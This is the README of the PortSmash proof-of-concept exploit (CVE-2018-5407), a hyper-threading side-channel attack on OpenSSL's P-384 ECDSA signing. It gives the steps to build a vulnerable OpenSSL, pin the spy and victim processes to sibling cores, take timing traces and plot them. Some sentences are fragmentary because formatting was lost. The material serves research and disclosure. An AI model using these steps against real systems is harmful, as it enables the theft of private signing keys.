This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.
More technical details about the PortSmash side-channel are available in this manuscript.
This software is licensed under the terms of the Apache License, Version 2.0.
A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.
This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in
spyis likely needed.
Download and install OpenSSL 1.1.0h or lower:
cd /usr/local/src wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz tar xzf openssl-1.1.0h.tar.gz cd openssl-1.1.0h/ export OPENSSL_ROOT_DIR=/usr/local/ssl ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib make -j8 make test sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw
If you use a different path, you'll need to make changes to
Turns off frequency scaling and TurboBoost.
Sync trace through pipes. It has two victims, one of which should be active at a time:
dgstcommand to produce a P-384 signature.
eccthat calls scalar multiplication directly with a known key. (Useful for profiling.)
The script will generate a P-384 key pair in
secp384r1.pemif it does not already exist.
The script outputs
data.binwhich is what
openssl dgstsigned, and you should be able to verify the ECDSA signature
openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin
secp384r1.pemare meaningless and
data.sigis not created.
sync.sh, the cores need to be two logical cores of the same physical core; sanity check with
$ grep '^processor\|^core id' /proc/cpuinfo processor : 0 core id : 0 processor : 1 core id : 1 processor : 2 core id : 2 processor : 3 core id : 3 processor : 4 core id : 0 processor : 5 core id : 1 processor : 6 core id : 2 processor : 7 core id : 3
So the script is currently configured for logical cores 3 and 7 (
processor) that both map to physical core 3 (
Measurement process that outputs measurements in
timings.bin. To change the
spystrategy, check the port defines in
spy.h. Only one strategy should be active at build time.
timings.binis actually raw clock cycle counter values, not latencies. Look in
parse_raw_simple.pyto understand the data format if necessary.
Victim harness for running OpenSSL scalar multiplication with known inputs. Example:
./ecc M 4 deadbeef0123456789abcdef00000000c0ff33
Will execute 4 consecutive calls to
EC_POINT_mulwith the given hex scalar.
Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.
You might have to adjust the
CEILvariable if the plots are too aggressively clipped.
sudo apt-get install python-numpy python-matplotlib python-scipy
Optional but recommended to view peaks:
sudo pip install --upgrade scipy
Turn off frequency scaling:
Make sure everything builds:
make clean make
Take a measurement:
View the trace:
python parse_raw_simple.py timings.bin
You can play around with one victim at a time in
sync.sh. Sample output for the
openssl dgstvictim is in
This project has received funding from the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No 804476).